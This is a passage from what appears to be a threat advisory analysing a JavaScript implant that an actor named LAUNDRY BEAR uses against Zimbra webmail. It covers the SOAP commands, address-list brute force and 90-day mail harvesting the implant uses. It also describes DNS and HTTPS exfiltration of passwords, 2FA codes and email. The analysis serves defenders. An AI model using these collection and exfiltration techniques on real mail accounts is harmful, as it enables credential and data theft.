&lt;p&gt;As demonstrated in the &lt;a href=&quot;#persistence1&quot;&gt;Persistence and credential access&lt;/a&gt; section, this script relies heavily on SOAP requests to collect victim information. To make these requests, the script aims to acquire the victim’s current CSRF token, which it attempts to access within the webpage’s local storage using localStorage.getItem(&quot;csrfToken&quot;). If the script is unable to acquire this CSRF token, it will be unable to make any SOAP requests. In addition to the SOAP commands documented in the &lt;a href=&quot;#persistence1&quot;&gt;Persistence and credential access&lt;/a&gt; section, other SOAP commands executed to collect victim information are shown in &lt;a href=&quot;#table1&quot;&gt;&lt;strong&gt;Table 1&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table1&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 1: Additional SOAP commands used&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;SOAP Command&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Namespace&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Stage&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;GetInfoRequest&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;zimbraAccount&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;gather_environment&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;GetDeviceStatusRequest&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;zimbraSync&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;gather_device_status&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;GetOAuthConsumersRequest&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;zimbraAccount&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;gather_oauth_consumers&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;SearchGalRequest&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;zimbraAccount&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW195872110 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW195872110 BCX8&quot;&gt;
&lt;p&gt;gather_gal&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;The script attempts to collect the victim’s GAL through brute force by searching for each two-character combination from a character set of “abcdefghijklmnopqrstuvwxyz1234567890.-_”. These queries are conducted using 20 batches of SOAP requests with 77 “SearchGalRequest” SOAP commands in each batch except for the last request containing only 58.&lt;/p&gt;
&lt;p&gt;During the &lt;em&gt;gather_environment&lt;/em&gt; stage, the script attempts to determine which type of ZCS webmail client the victim is using. The script checks the user’s current URL to determine the client type being used, checking for certain indicators (shown in &lt;a href=&quot;#table2&quot;&gt;&lt;strong&gt;Table 2&lt;/strong&gt;&lt;/a&gt;) to determine the client type. The corresponding value is then used as the payload when exfiltrating the client type.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table2&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 2: ZCS webmail client types&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW28945023 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW28945023 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Indicator&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW28945023 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW28945023 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Client Type&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW28945023 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW28945023 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Associated Value&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW28945023 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW28945023 BCX8&quot;&gt;
&lt;p&gt;?client=advanced&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW28945023 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW28945023 BCX8&quot;&gt;
&lt;p&gt;Advanced&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW28945023 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW28945023 BCX8&quot;&gt;
&lt;p&gt;c&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW28945023 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW28945023 BCX8&quot;&gt;
&lt;p&gt;/h/&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW28945023 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW28945023 BCX8&quot;&gt;
&lt;p&gt;Standard&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW28945023 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW28945023 BCX8&quot;&gt;
&lt;p&gt;h&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW28945023 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW28945023 BCX8&quot;&gt;
&lt;p&gt;/modern/&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW28945023 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW28945023 BCX8&quot;&gt;
&lt;p&gt;Modern&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW28945023 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW28945023 BCX8&quot;&gt;
&lt;p&gt;m&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;As part of collection, the script attempts to harvest any emails not marked as “junk” from the last 90 days from the victim’s account. Emails are collected daily by an HTTP GET request to the URL path, “/home/~/?fmt=tgz&amp;amp;meta=0&amp;amp;query=date:-{DAY_OFFSET}d AND (not in:junk)”. The &lt;em&gt;{DAY_OFFSET}&lt;/em&gt; value would be between 0 and 89 representing how many days ago the email was sent or received. To prevent redundant collection and exfiltration of emails, a variable with a name based on the email date being queried, using a format of &lt;em&gt;zd_comp_YYYY-MM-DD&lt;/em&gt;, and value of &lt;em&gt;true&lt;/em&gt;, is saved to the &lt;em&gt;window.top.localStorage&lt;/em&gt; property. This variable is saved regardless of whether the email is successfully exfiltrated. &amp;nbsp;&lt;/p&gt;
&lt;p&gt;According to Mozilla documentation, if the user is not in a private browsing session, any data stored to localStorage does not typically expire. This means that if the user happens to execute the script again from the same computer, the script avoids attempting to re-exfiltrate previously captured emails. However, the script always attempts to pull any emails with a &lt;em&gt;{DAY_OFFSET} &lt;/em&gt;of zero. In other words, the script always pulls emails sent or received the same day it is run. After email results are returned from the query for each day of email activity, those results are then passed to Flowerbed as described in the &lt;a href=&quot;#exfil1&quot;&gt;Exfiltration&lt;/a&gt; section.&lt;/p&gt;
&lt;p&gt;The script also provides LAUNDRY BEAR with telemetry on any errors that occur during the collection process. This is accomplished by executing any collection or exfiltration code through helper functions that contain error handling logic. If an error occurs, a payload containing information on the error itself, the context of the error happening, and the stage in which the error occurred is sent to Flowerbed as described in the &lt;a href=&quot;#exfil1&quot;&gt;Exfiltration&lt;/a&gt; section below. For cases where the error occurs within a SOAP request, “:api” is concatenated to the stage value in the payload. If an error occurs during the batch SOAP requests that occur when collecting the GAL of the victim, the stage value will use a format of &lt;em&gt;gather_gal:{VAL}:api&lt;/em&gt;. The &lt;em&gt;{VAL}&lt;/em&gt; placeholder indicates which batch request, a number from 0 to 19, the error occurred in. Errors that occur during the password autocomplete interception process will use “gather_autocomplete_password:dom” for the stage value. Finally, if an error occurs when attempting to collect or exfiltrate a specific day’s emails, the stage will include which day the error occurred on, using the previously defined placeholder &lt;em&gt;{DAY_OFFSET},&lt;/em&gt; with a format of &lt;em&gt;sendArchive:day-{DAY_OFFSET}&lt;/em&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Exfiltration&lt;/strong&gt;&lt;/em&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;exfil1&quot;&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;At the end of each stage in the collection process, the script attempts to exfiltrate acquired information to Flowerbed. The script primarily relies on two forms of data exfiltration: DNS [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1048/003/&quot; target=&quot;_blank&quot;&gt;T1048.003&lt;/a&gt;] and HTTPS. Some information is exfiltrated over both the DNS and HTTPS channels.&lt;/p&gt;
&lt;p&gt;Prior to exfiltration, a randomized 10- or 11-character alphanumeric string is generated as an identifier for the victim. This identifier is included in the URL of both the DNS- and HTTPS-based exfiltration. &amp;nbsp;&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;DNS exfiltration&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;DNS exfiltration occurs through DNS A record queries. To ensure data exfiltrated through DNS is not corrupted when traversing through non-actor-controlled DNS infrastructure, &lt;em&gt;Ulej &lt;/em&gt;maintains compliance with RFC 1035, Domain Names - Implementation and Specification, specifically accounting for the case insensitivity and subdomain length requirements. Base32 encoding is used to create a case-insensitive payload. Once the payload is encoded, a period (“.”) is added every 60 characters to ensure each subdomain is under 63 characters long. The script then creates a new image object sourced from a URL with the scheme defined in &lt;a href=&quot;#figure6&quot;&gt;&lt;strong&gt;Figure 6&lt;/strong&gt;&lt;/a&gt;. Any traffic involving DNS exfiltration will have “d-“ prefixing the victim identifier, and the subdomain immediately following indicates the type of information being exfiltrated.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;figure6&quot;&gt;&lt;/a&gt;&lt;/p&gt;



&lt;figure class=&quot;c-figure c-figure--image&quot; role=&quot;group&quot;&gt;
  
  &lt;div class=&quot;c-figure__media&quot;&gt;    &lt;img loading=&quot;lazy&quot; src=&quot;/sites/default/files/styles/large/public/2026-07/Figure6.png?itok=Tv8RT8o8&quot; width=&quot;1024&quot; height=&quot;49&quot; alt=&quot;Figure 6: Structure for information exfiltrated by DNS&quot;&gt;



&lt;/div&gt;
      &lt;figcaption class=&quot;c-figure__caption&quot;&gt;&lt;em&gt;&lt;strong&gt;Figure 6: Structure for information exfiltrated by DNS&lt;/strong&gt;&lt;/em&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
&lt;p&gt;When the script generates an image object, the browser tries to retrieve the complete domain of the URL specified as the source of the image. This triggers a DNS request sent to the actor-controlled server and processed by Flowerbed. &lt;a href=&quot;#table3&quot;&gt;&lt;strong&gt;Table 3&lt;/strong&gt;&lt;/a&gt; lists both the information exfiltrated via DNS and their corresponding data type identifiers in the DNS queries. &amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table3&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 3: DNS exfiltration&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Type of Information&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Exfiltration Stage&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Data Type&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;Victim’s Email Address&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;gather_email&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;e&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;Client Type&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;gather_environment&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;c&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;Zimbra Version&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;gather_environment&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;v&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;URL at Time of Exploitation&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;gather_environment&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;url&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;2FA Scratch Codes&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;gather_2fa_codes&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;2fa&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;Newly Created Application Password&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;gather_app_password&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;pa&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;Harvested Autocomplete Password&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;gather_autocomplete_password&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW258158484 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW258158484 BCX8&quot;&gt;
&lt;p&gt;pw&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h4&gt;&lt;strong&gt;HTTPS exfiltration&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Any information exfiltrated via DNS is also exfiltrated through HTTPS, as well as additional data including email content, contacts, attachments, and error logging information. By using Let’s Encrypt certificates, this group can quickly deploy new infrastructure and leverage encrypted HTTPS communications with valid server certificates when exfiltrating information from the victim’s environment. The HTTPS exfiltration capability only uses two HTTP content types, defined in &lt;a href=&quot;#table4&quot;&gt;&lt;strong&gt;Table 4&lt;/strong&gt;&lt;/a&gt;. Traffic associated with HTTPS exfiltration will use the URL scheme shown in &lt;a href=&quot;#figure7&quot;&gt;&lt;strong&gt;Figure 7&lt;/strong&gt;&lt;/a&gt;. &amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;table4&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;caption&gt;&lt;em&gt;&lt;strong&gt;Table 4: HTTPS exfiltration types&lt;/strong&gt;&lt;/em&gt;&lt;/caption&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW3397685 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW3397685 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Content Type&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW3397685 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW3397685 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;URL Path&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW3397685 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW3397685 BCX8&quot;&gt;
&lt;p&gt;application/json&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW3397685 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW3397685 BCX8&quot;&gt;
&lt;p&gt;/v/p&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW3397685 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW3397685 BCX8&quot;&gt;
&lt;p&gt;application/octet-stream&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW3397685 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW3397685 BCX8&quot;&gt;
&lt;p&gt;/v/d&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;figure7&quot;&gt;&lt;/a&gt;&lt;/p&gt;



&lt;figure class=&quot;c-figure c-figure--image&quot; role=&quot;group&quot;&gt;
  
  &lt;div class=&quot;c-figure__media&quot;&gt;    &lt;img loading=&quot;lazy&quot; src=&quot;/sites/default/files/styles/large/public/2026-07/Figure%207.png?itok=CdTcyMdN&quot; width=&quot;1024&quot; height=&quot;50&quot; alt=&quot;Figure 7: Structure for information exfiltrated by HTTPS&quot;&gt;



&lt;/div&gt;
